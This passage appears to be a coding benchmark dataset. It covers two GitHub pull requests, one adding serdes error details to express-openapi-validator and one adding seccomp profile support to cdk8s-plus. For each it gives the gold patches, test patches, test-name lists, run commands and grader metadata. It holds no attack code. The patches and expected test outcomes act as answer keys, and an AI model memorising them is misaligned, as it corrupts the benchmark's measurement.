"should return 400 if an additional property is encountered", "should return 200 if coercion is enabled and the type is correct", "should return 200 if coercion is enabled and the type is incorrect but can be coerced", "should return 400 if coercion is enabled and the type is incorrect and cannot be coerced", "should return 200 if coercion is disabled and the type is correct", "should return 400 if coercion is 
disabled and the type is incorrect", "should validate and serialize date-time", "should validate and serialize date", "should be able to return `true` as the response body", "should coerce id from string to number", "should validate 200 using explicit response", "should validate undeclared 400 using default response", "custom error handler invoked if response field has a value of incorrect type", "custom error handler not invoked on valid response", "returns error if custom error handler throws", "should fail if response field has a value of incorrect type", "should remove additional properties when set false", "should remove nested additional prop if additionalProperties is false", "should pass if response is a list", "should return 200 on valid responses 200 $ref", "should fail if response is array when expecting object", "should return 200 if returns expect object (using allOf) with type object", "should fail if response is empty object", "should fail if response is empty", "should return throw 500 on invalid error response", "should return 204 for endpoints that return empty response", "should fail if response is not empty and an empty response is expected", "should fail if additional properties are provided when set false", "should pass if value is null", "should be able to return `false` as the response body", "should validate the using default (in this case the error object)", "should throw error when default response is invalid", "should return an error if field type is invalid", "should return 404 for undocumented route when using Router", "should return 200 if no security", "should skip validation, even if auth header is missing for basic auth", "should skip security validation, even if auth header is missing for bearer auth", "should return 401 if cookie auth property is missing", "should return 401 if apikey handler throws exception", "should return 401 if apikey handler returns false", "should return 401 if apikey handler returns Promise with false", 
"should return 401 if cookie auth handler returns Promise with false", "should return 401 if apikey handler returns Promise reject with custom message", "should return 401 if apikey header is missing", "should return 200 if apikey header exists and handler returns true", "should return 404 if apikey header exists and handler returns true but path doesnt exist", "should return 401 if auth header is missing for basic auth", "should return 401 if auth header has malformed basic auth", "should return 401 if auth header is missing for bearer auth", "should return 401 if auth header has malformed bearer auth", "should return 200 if bearer auth succeeds", "should return 200 if oauth2 auth succeeds", "should return 403 if oauth2 handler throws 403", "should return 200 if openid auth succeeds", "should return 500 if security handlers are defined, but not for all securities", "should return 200 if api_key or anonymous and no api key is supplied", "should return 200 if api_key or anonymous and api key is supplied", "should return 401 if not X-Api-Key is missing", "should return 401 if Bearer token is missing", "should return 200 when X-Api-Key and Bearer token are present", "should return 200 when Basic auth is present", "should inherit top level security and return 401 if apikey header is missing", "should return 200 if apikey exists", "should return 404 if apikey exist, but path doesnt exist", "should return 405 if apikey exist, but invalid method used", "should return 200 if apikey exist as query param", "should return 200 if apikey exist as query param with another query parmeter in the request", "should return 200 if apikey exist as query param with no query parmeter in the request but in the spec", "should return 200 if apikey or anonymous", "should override api key with bearer and return 401 if bearer is missing", "should override api key with bearer and return 200", "should override api key with anonymous", "should control BAD id format and throw an error", "should 
control GOOD id format and get a response in expected format", "should POST also works with deserialize on request then serialize en response", "should POST throw error on invalid schema ObjectId", "should POST throw error on invalid schema Date", "should throw error 500 on invalid object type instead of Date expected", "should POST throw error for deserialize on request of non-string format", "should explode deepObject and set default", "should explode deepObject query params", "should explode deepObject query params (optional query param)", "should use defaults when empty", "should use defaults for values not provided", "should deserialize object", "should not deserialize when non-object", "should fail on validation, not parsing", "should explode query param object e.g. tag_ids, state as query params", "should explode deepObject query params with default values", "should explode deepObject $ref query params with default values", "should validate server path with version variable, v2 and petstore", "should validate server path with version variable, v2 and storeofpets", "should skip validation of api path with invalid enum value v3, and valid value petstore", "should validate server path with version variables, v2 and petstore", "should validate server path with version variables, v2 and storeofpets", "should skip validation of api path with invalid variable value, v2, and valid variable petstore", "should return 200 for valid request with unknown format", "should allow path param without wildcard", "should allow path param with slashes \"/\" using wildcard", "should return not found if no path is specified", "should return 200 when wildcard path includes all required params", "should 400 when wildcard path is missing a required query param", "should return 200 if root of an existing wildcard route is defined", "should not allow ready only inlined properties in requests", "should not allow write only inlined properties in responses", "should return 200 if no 
write-only properties are in the responses", "should not allow write only properties in responses (nested schema $refs)" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci", "npm run compile" ], "log_parser": "parse_log_js", "test_cmd": "npx mocha -r source-map-support/register -r ts-node/register --files --recursive -R spec test/**/*.spec.ts 2>&1 | sed 's/\\x1b\\[[0-9;]*m//g'" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "zzgab", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests support for default export handlers via the optional 'x-eov-operation-handler' property. The provided test asserts that a handler exported as default is correctly resolved and returns a success response. The test aligns with the expected behavior and does not introduce unrelated requirements. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, 
"test_sample_without_replacement": null } }
56f778b524f313f50b1570a50813e34474fd9f31
2021-12-24 09:55:42
cdimascio: @pilerou, can you separate the bug fix from the new feature i'd like to get the bug fix in immediately, but need more time to consider the feature request. pilerou: Hi @cdimascio I did the revert in my fork on origin/master linked to this PR. There's only fixes now on my master branch. I created a branch for the new feature #683 : https://github.com/pilerou/express-openapi-validator/tree/initAjv Do you want me to create another separated Pull request or do you want to have a look in my branch ? cdimascio: @pilerou please create another PR. makes the merge and diff simpler to review
cdimascio__express-openapi-validator-684
diff --git a/src/framework/ajv/index.ts b/src/framework/ajv/index.ts index bd5a6f7..ca879d4 100644 --- a/src/framework/ajv/index.ts +++ b/src/framework/ajv/index.ts @@ -59,6 +59,15 @@ function createAjv( obj[propName] = sch.deserialize(data); } catch(e) { + (<ajv.ValidateFunction>validate).errors = [ + { + keyword: 'serdes', + schemaPath: data, + dataPath: path, + message: `format is invalid`, + params: { 'x-eov-serdes': propName }, + }, + ]; return false; } } @@ -108,6 +117,15 @@ function createAjv( obj[propName] = sch.serialize(data); } catch(e) { + (<ajv.ValidateFunction>validate).errors = [ + { + keyword: 'serdes', + schemaPath: data, + dataPath: path, + message: `format is invalid`, + params: { 'x-eov-serdes': propName }, + }, + ]; return false; } }
Patch on serdes test and allow to use generated AJV out of Express usage It fixes a bug in serdes unit test by sending a more human readable message AND it could allow to use the generated Ajv behind OpenApiValidator out of an express usage. It could be great, for example, to validate websocket request...
**Title** Improve serdes error reporting and expose generated AJV for non‑Express usage **Problem** - Serdes unit tests receive unhelpful error output, making debugging difficult. - The AJV instance created by the OpenAPI validator is tightly coupled to Express, preventing reuse in other contexts such as WebSocket validation. **Root Cause** - When serialization or deserialization fails, no detailed AJV error information is attached, resulting in a generic failure. - The generated AJV validator is not exported for external consumption. **Fix / Expected Behavior** - Attach a custom AJV error object containing a clear message and identifying the offending property whenever serdes conversion fails. - Ensure the error includes a dedicated keyword and relevant parameters for easier identification. - Make the generated AJV validator usable independently of the Express framework. - Preserve existing validation logic while providing richer error details. **Risk & Validation** - Changing error handling could impact callers that rely on the previous generic failure; verify backward compatibility. - Run the serdes unit tests to confirm the new, human‑readable messages appear as expected. - Add integration tests that invoke the generated AJV validator outside Express (e.g., for WebSocket payloads) to ensure correct operation.
684
cdimascio/express-openapi-validator
diff --git a/test/serdes.spec.ts b/test/serdes.spec.ts index 3f822f8..0260326 100644 --- a/test/serdes.spec.ts +++ b/test/serdes.spec.ts @@ -307,13 +307,13 @@ describe('serdes serialize response components only', () => { .expect(500) .then((r) => { console.log(r); - expect(r.body.message).to.equal('d.toISOString is not a function'); + expect(r.body.message).to.equal('.response.creationDate format is invalid'); })); /* FIXME Manage format validation after serialize ? I can serialize using a working serialize method but that respond a bad format it('should throw error 500 on an object that serialize to a bad string format', async () => - + request(app) .get(`${app.basePath}/users/5fdefd13a6640bb5fb5fa925`) .query({baddateresponse : 'functionBadFormat'}) @@ -322,7 +322,7 @@ describe('serdes serialize response components only', () => { console.log(r.body); expect(r.body.message).to.equal('Something saying that date is not date-time format'); })); - + */ });
[ "should throw error 500 on invalid object type instead of Date expected" ]
[ "create campaign should return 201", "create campaign should return 400", "create campaign should return 200", "should return 200", "should return 201", "does not mutate the API specification", "does not validate responses which are not present in the spec", "should allow additional / unknown properties properties", "should return 400 on missing required prop (when using additional props explode object)", "should return 400 if additionalProperties=false, and type is invalid", "should return 400 if additionalProperties=false, but extra props sent", "should return 200 if additonalProperities=true and extra props are sent", "should not validate schema for requests since schema is validated on startup", "should not validate schema for response since schema is validated on startup", "should not validate schema for preprocessor since schema is validated on startup", "should not validate schema for multipar since schema is validated on startup", "should set serdes deserialize", "should set serdes serialize", "should set serdes serialize and deserialize", "should set serdes serialize and deserialize separately", "should validate allOf", "should fail validation due to missing required id field", "should fail validation due to missing required name field", "adds \"Allow\" header to 405 - Method Not Allowed", "should validate circular ref successfully", "should return 400 since is_cat is passed as string not boolean", "should return 400 when age is passed as string, but number is expected", "should return 400 when age (number) is null", "should return 200 when all are typed correctly", "should keep is_cat as boolean", "should return 400 when is_cat requires string type \"true\", but boolean specified", "should handle components.parameter $refs", "should match wildcard type */*", "should match wildcard type application/*", "should null if no accept specified", "should match media type if charset is not specified in accepts", "should match media type if charset is specified 
in accepts, but charset not defined in schema", "should return 200 if testDateTimeProperty is provided with invalid, but correctly formatted date time and default validation is enabled (past compatibility)", "should return 400 if testDateTimeProperty is provided with incorrectly formatted date time and default validation enabled (past compatibility)", "should return 200 if testDateTimeProperty is provided with incorrectly formatted date time and format validation disabled", "should return 200 if testDateTimeProperty is provided with valid date time and full validation enabled", "should return 400 if testDateTimeProperty is provided with invalid date time and full validation enabled", "should use default export operation", "should throw 400 if servers are empty and request is malformed", "should be able to use an endpoint with some nested paths $ref", "should be able to use an endpoint with some nested paths $ref 2", "should handle float type with negative", "should handle float type with 0 value", "should handle float type with positive value", "should require the query parameter number_id has 3 digits", "should require the query parameter string_id has 3 letters", "should return success if the query parameter string_id has 3 letters", "should return 400 missing required header", "should return 400 invalid required header", "should return 200 for valid headers", "should throw 400 if required header is missing", "should find appropriate request body in spec by contentType with charset (compatibility)", "should find appropriate request body in spec by contentType with charset", "should match mediatype when charset case does not match the case defined in the spec", "should be an instance of BadRequest", "should be an instance of InternalServerError", "should be an instance of UnsupportedMediaType", "should be an instance of RequestEntityTooLarge", "should be an instance of MethodNotAllowed", "should be an instance of NotFound", "should be an instance of Unauthorized", 
"should be an instance of Forbidden", "should ignore path and return 200, rather than validate", "should not ignore path and return 404", "should validate a path within the base path that is not ignored", "should validate a route defined in openapi but not express with invalid params", "should return 404 if route is defined in openapi but not express and params are valid", "should propagate spec errors when validateApiSpec is true", "should fail gracefully when validateApiSpec is false", "should throw 400 when required multipart file field", "should throw 400 when required form field is missing during multipart upload", "should validate x-www-form-urlencoded form_pa and and form_p2", "should throw 405 get method not allowed", "should throw 415 unsupported media type", "should return 400 when improper range specified", "should validate a request body with a schemaObject $ref", "should validate a requestBody $ref", "should validate a requestBody $ref that contains a schemaObject $ref", "should validate application/octet-stream file and metadata", "should validate multipart file and metadata", "should fail, because response does not satisfy schema", "should pass if /components is not present", "should allow null to be set (name: nullable true)", "should not fill an explicity null with default when coerceTypes is false", "should fill unspecified field with default when coerceTypes is false", "should fail if required and not provided (nullable true)", "should fail if required and not provided (nullable false", "should fail if required and provided as null when nullable is false", "should allow nullable object", "should not coerce a nullable int", "should return 200 for dog", "should return 200 for cat and populate default color", "should return 400 for dog with cat props", "should return 400 a bad discriminator", "should return 200 for puppy", "should return 200 for cat", "should return 200 for kitty", "should return 200 for Dog", "should return 200 for Cat", "should 
return 200 one first oneOf option", "should return 200 one second oneOf option", "should return 400 for invalid oneOf option", "should return 200 on first oneOf (b) option", "should return 200 on second oneOf (b) option", "should return 400 for invalid oneOf (b) option", "post type anyOf (without readonly id) should pass", "post type oneOf (without readonly id) should pass", "post type anyof without providing the single required readonly property should pass", "should fail if posting anyof with bad discriminator", "should throw 400 on missing required query parameter", "should respond with json on proper get call", "should return 400 with unknown query parameter", "should return 400 when non-urlencoded JSON in query param", "should return 200 when JSON in query param", "should return 400 when improper JSON in query param", "should return 400 when comma separated array in query param", "should return 400 when comma separated array in query param is not url encoded", "should return 200 when separated array in query param", "should return 400 when improper separated array in query param", "should return 200 when array explode in query param", "should return 400 when improper array explode in query param", "should return 400 if required body is missing", "should return 400 if required \"name\" property is missing", "should return 200 when post props are met", "should not validate a route defined in express, but not under an openapi basepath", "should return 400 if route is defined in openapi but not express and is called with invalid parameters", "should return 404 if route is defined in swagger but not express", "should throw 404 on a route defined in express, but not documented in the openapi spec", "should return 405 if route is defined in swagger but not express and the method is invalid", "should return 404 for route not defined in openapi or express", "should return 404 for a route defined in express, but not documented in openapi", "should return 415 when media 
type is not supported", "should return 405 when method is not allows", "should return 400 when path param should be int, but instead is string", "should return 400 an invalid enum value is given", "should handle multiple path params with coereion", "should return 200 and get the id from the response", "should not install handlers when nothing provided", "should use the default handler when string provided", "can use a custom operation resolver", "should recognize mapped operation", "create document should return 201", "create document should return 201 with empty body", "return 415", "should return 400 if pathLevel query parameter is not provided", "should return 400 if operationLevel query parameter is not provided", "should return 400 if neither operationLevel, nor pathLevel query parameters are provided", "should return 200 if both pathLevel and operationLevel query parameter are provided", "should match on users test", "static routes should be matched before dynamic routes", "should url decode path parameters (type level)", "should url decode path parameters (path level)", "should handle path parameter with style=simple", "should handle :'s in path parameters", "should sort dynamic leafs after static leafs", "should sort dynamic inner paths after static inner paths", "should pass if known query params are specified", "should not fail if unknown query param is specified", "should fail if operation overrides x-allow-unknown-query-parameters=false", "should reject any query param when endpoint declares none", "should return 200 if no query params are supplied", "should fail if unknown query param is specified", "should return 200 if operation overrides x-allow-unknown-query-parameters=true", "should not allow empty query param value", "should allow empty query param value with allowEmptyValue: true", "should succeed when query param 'name' has empty value and sets allowEmptyValue: true", "should not allow reserved characters", "should may allow reserved characters 
when allowedReserved: true", "should not allow read only properties in requests", "should allow read only properties in responses", "should not allow read only inlined properties in requests", "should not allow read only properties in requests (nested schema $refs)", "should not allow read only properties in requests (deep nested schema $refs)", "should pass validation if required read only properties to be missing from request ($ref)", "should pass validation if required read only properties to be missing from request (inlined)", "should pass validation if required read only properties to be missing from request (with charset)", "should fail validation if required read only properties is missing from the response", "should require readonly required property in response", "should return 500 if readonly required property is missing from response", "should return 415 for undeclared media type", "should return 200 if text/plain request body is satisfied", "should return 200 if text/html request body is satisfied by */*", "should return 200 if application/ld+json request body is satisfied by application/*", "should return 200 if application/vnd.api+json; type=two request body is validated agains the corrent schema", "should return 400 if testProperty body property is not provided", "should return 200 if testProperty body property is provided", "should return 400 if array is passed (instead of object) and the array includes an object that meets requirements", "should return 200 if a json suffex is used for content-type", "should return 500 if additional response body property is returned", "should return 400 if an additional property is encountered", "should return 200 if coercion is enabled and the type is correct", "should return 200 if coercion is enabled and the type is incorrect but can be coerced", "should return 400 if coercion is enabled and the type is incorrect and cannot be coerced", "should return 200 if coercion is disabled and the type is correct", "should 
return 400 if coercion is disabled and the type is incorrect", "should validate and serialize date-time", "should validate and serialize date", "should be able to return `true` as the response body", "should coerce id from string to number", "should validate 200 using explicit response", "should validate undeclared 400 using default response", "custom error handler invoked if response field has a value of incorrect type", "custom error handler not invoked on valid response", "returns error if custom error handler throws", "should fail if response field has a value of incorrect type", "should remove additional properties when set false", "should remove nested additional prop if additionalProperties is false", "should pass if response is a list", "should return 200 on valid responses 200 $ref", "should fail if response is array when expecting object", "should return 200 if returns expect object (using allOf) with type object", "should fail if response is empty object", "should fail if response is empty", "should return throw 500 on invalid error response", "should return 204 for endpoints that return empty response", "should fail if response is not empty and an empty response is expected", "should fail if additional properties are provided when set false", "should pass if value is null", "should be able to return `false` as the response body", "should validate the using default (in this case the error object)", "should throw error when default response is invalid", "should return an error if field type is invalid", "should return 404 for undocumented route when using Router", "should return 200 if no security", "should skip validation, even if auth header is missing for basic auth", "should skip security validation, even if auth header is missing for bearer auth", "should return 401 if cookie auth property is missing", "should return 401 if apikey handler throws exception", "should return 401 if apikey handler returns false", "should return 401 if apikey handler 
returns Promise with false", "should return 401 if cookie auth handler returns Promise with false", "should return 401 if apikey handler returns Promise reject with custom message", "should return 401 if apikey header is missing", "should return 200 if apikey header exists and handler returns true", "should return 404 if apikey header exists and handler returns true but path doesnt exist", "should return 401 if auth header is missing for basic auth", "should return 401 if auth header has malformed basic auth", "should return 401 if auth header is missing for bearer auth", "should return 401 if auth header has malformed bearer auth", "should return 200 if bearer auth succeeds", "should return 200 if oauth2 auth succeeds", "should return 403 if oauth2 handler throws 403", "should return 200 if openid auth succeeds", "should return 500 if security handlers are defined, but not for all securities", "should return 200 if api_key or anonymous and no api key is supplied", "should return 200 if api_key or anonymous and api key is supplied", "should return 401 if not X-Api-Key is missing", "should return 401 if Bearer token is missing", "should return 200 when X-Api-Key and Bearer token are present", "should return 200 when Basic auth is present", "should inherit top level security and return 401 if apikey header is missing", "should return 200 if apikey exists", "should return 404 if apikey exist, but path doesnt exist", "should return 405 if apikey exist, but invalid method used", "should return 200 if apikey exist as query param", "should return 200 if apikey exist as query param with another query parmeter in the request", "should return 200 if apikey exist as query param with no query parmeter in the request but in the spec", "should return 200 if apikey or anonymous", "should override api key with bearer and return 401 if bearer is missing", "should override api key with bearer and return 200", "should override api key with anonymous", "should control BAD id format 
and throw an error", "should control GOOD id format and get a response in expected format", "should POST also works with deserialize on request then serialize en response", "should POST throw error on invalid schema ObjectId", "should POST throw error on invalid schema Date", "should POST throw error for deserialize on request of non-string format", "should explode deepObject and set default", "should explode deepObject query params", "should explode deepObject query params (optional query param)", "should use defaults when empty", "should use defaults for values not provided", "should deserialize object", "should not deserialize when non-object", "should fail on validation, not parsing", "should explode query param object e.g. tag_ids, state as query params", "should explode deepObject query params with default values", "should explode deepObject $ref query params with default values", "should validate server path with version variable, v2 and petstore", "should validate server path with version variable, v2 and storeofpets", "should skip validation of api path with invalid enum value v3, and valid value petstore", "should validate server path with version variables, v2 and petstore", "should validate server path with version variables, v2 and storeofpets", "should skip validation of api path with invalid variable value, v2, and valid variable petstore", "should return 200 for valid request with unknown format", "should allow path param without wildcard", "should allow path param with slashes \"/\" using wildcard", "should return not found if no path is specified", "should return 200 when wildcard path includes all required params", "should 400 when wildcard path is missing a required query param", "should return 200 if root of an existing wildcard route is defined", "should not allow ready only inlined properties in requests", "should not allow write only inlined properties in responses", "should return 200 if no write-only properties are in the responses", 
"should not allow write only properties in responses (nested schema $refs)" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci", "npm run compile" ], "log_parser": "parse_log_js", "test_cmd": "npx mocha -r source-map-support/register -r ts-node/register --files --recursive -R spec test/**/*.spec.ts 2>&1 | sed 's/\\x1b\\[[0-9;]*m//g'" }
{ "num_modified_files": 1, "num_modified_lines": 18, "pr_author": "pilerou", "pr_labels": [], "llm_metadata": { "code": "B2|B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to fix a failing serdes unit test by producing a more readable error message and to expose the generated AJV instance for non‑Express use. The provided test patch only changes the expected error string without explaining why that exact wording is required, and the golden patch shows the actual code change needed to set custom AJV errors. Because the specification does not state the required message format or the exact exposure mechanism, the intent is only partially described and the test expectation is implicit, leading to ambiguous specification and implicit naming issues. Therefore the task is classified as B4 (with a secondary B2 signal).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects a specific error message string ('.response.creationDate format is invalid') that is not mentioned in the issue description.", "The test contains a commented‑out block with a FIXME that is unrelated to the described fix." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
98796b2c914ec340bd7c17772cdba3e2a5c3218a
2024-08-08 11:02:54
iliapolo: Also see https://github.com/cdk8s-team/cdk8s-plus/pull/4500#issuecomment-2283286630. Thanks! serhatcetinkaya: @iliapolo thanks for the review, #4500 is merged 👍 I sent a fix to separate the tests for this one, can you please also take a look at #4483 when you have time? thanks in advance iliapolo: @serhatcetinkaya this is also need to update from upstream
cdk8s-team__cdk8s-plus-4499
diff --git a/src/container.ts b/src/container.ts index 77b8d202..f145ff0f 100644 --- a/src/container.ts +++ b/src/container.ts @@ -181,6 +181,37 @@ export enum Capability { WAKE_ALARM = 'WAKE_ALARM', } +export enum SeccompProfileType { + /** + * A profile defined in a file on the node should be used + */ + LOCALHOST = 'Localhost', + /** + * The container runtime default profile should be used + */ + RUNTIME_DEFAULT = 'RuntimeDefault', + /** + * No profile should be applied + */ + UNCONFINED = 'Unconfined', +} + +export interface SeccompProfile { + /** + * localhostProfile indicates a profile defined in a file on the node should be used. + * The profile must be preconfigured on the node to work. Must be a descending path, + * relative to the kubelet's configured seccomp profile location. + * Must only be set if type is "Localhost". + * + * @default - empty string + */ + readonly localhostProfile?: string; + /** + * Indicates which kind of seccomp profile will be applied + */ + readonly type: SeccompProfileType; +} + export interface ContainerSecutiryContextCapabilities { /** * Added capabilities @@ -252,6 +283,13 @@ export interface ContainerSecurityContextProps { * @default none */ readonly capabilities?: ContainerSecutiryContextCapabilities; + + /** + * Container's seccomp profile settings. Only one profile source may be set + * + * @default none + */ + readonly seccompProfile?: SeccompProfile; } /** @@ -331,8 +369,12 @@ export class ContainerSecurityContext { public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; public readonly capabilities?: ContainerSecutiryContextCapabilities; + public readonly seccompProfile?: SeccompProfile; constructor(props: ContainerSecurityContextProps = {}) { + if (props.seccompProfile?.localhostProfile && props.seccompProfile.type != SeccompProfileType.LOCALHOST) { + throw new Error('localhostProfile must only be set if type is "Localhost"'); + } this.ensureNonRoot = props.ensureNonRoot ?? 
true; this.privileged = props.privileged ?? false; this.readOnlyRootFilesystem = props.readOnlyRootFilesystem ?? true; @@ -340,6 +382,7 @@ export class ContainerSecurityContext { this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; this.capabilities = props.capabilities; + this.seccompProfile = props.seccompProfile; } /** @@ -354,6 +397,7 @@ export class ContainerSecurityContext { readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, capabilities: this.capabilities, + seccompProfile: this.seccompProfile, }; }
feat(container): support seccompProfile in container security context this adds support for SeccompProfile in container security context. please refer to: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#seccompprofile-v1-core this should also be backported to 1.29 and 1.28 main branches
**Title** Add seccomp profile support to container security context **Problem** Containers could not specify a Seccomp profile, preventing users from applying fine‑grained syscall filtering required by many security policies. The lack of this field also meant generated manifests were incomplete for workloads that rely on seccomp. **Root Cause** The container security context model did not expose any representation for seccomp configuration. **Fix / Expected Behavior** - Introduce a representation of seccomp profile types (runtime default, localhost, unconfined). - Allow a container security context to include an optional seccomp profile definition with a type and, when appropriate, a localhost profile path. - Enforce that a localhost profile can only be set when the type is *Localhost*. - Ensure the seccomp profile data is emitted in the rendered Kubernetes manifest under the container’s securityContext. - Preserve default behavior when no seccomp profile is provided. **Risk & Validation** - Verify that existing manifests remain unchanged when the seccomp profile is omitted. - Add unit tests to confirm proper validation of mismatched type/profile combinations and correct serialization. - Run integration tests against supported Kubernetes versions to ensure the new fields map to the official API without regressions.
4,499
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index f1795cd4..4b4a2ed2 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy, SeccompProfileType } from '../src'; describe('EnvValue', () => { @@ -778,6 +778,7 @@ test('default security context', () => { runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, capabilities: container.securityContext.capabilities, + seccompProfile: container.securityContext.seccompProfile, }); }); @@ -799,6 +800,9 @@ test('custom security context', () => { Capability.BPF, ], }, + seccompProfile: { + type: SeccompProfileType.RUNTIME_DEFAULT, + }, }, }); @@ -809,7 +813,37 @@ test('custom security context', () => { expect(container.securityContext.group).toEqual(2000); expect(container.securityContext.capabilities?.add).toEqual(['AUDIT_CONTROL']); expect(container.securityContext.capabilities?.drop).toEqual(['BPF']); + expect(container.securityContext.seccompProfile?.type).toEqual('RuntimeDefault'); + +}); +test('seccompProfile localhostProfile can not be used if type is not Localhost', () => { + + const container = new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.LOCALHOST, + localhostProfile: 'localhostProfile', + }, + }, + }); + + const spec = container._toKube(); + expect(spec.securityContext?.seccompProfile?.localhostProfile).toEqual('localhostProfile'); +}); + +test('seccompProfile localhostProfile must only be set if type is Localhost', () => { + + expect(() => new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: 
SeccompProfileType.UNCONFINED, + localhostProfile: 'localhostProfile', + }, + }, + })).toThrowError('localhostProfile must only be set if type is "Localhost"'); }); test('can configure a postStart lifecycle hook', () => {
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", 
"\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can mutate metadata", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can 
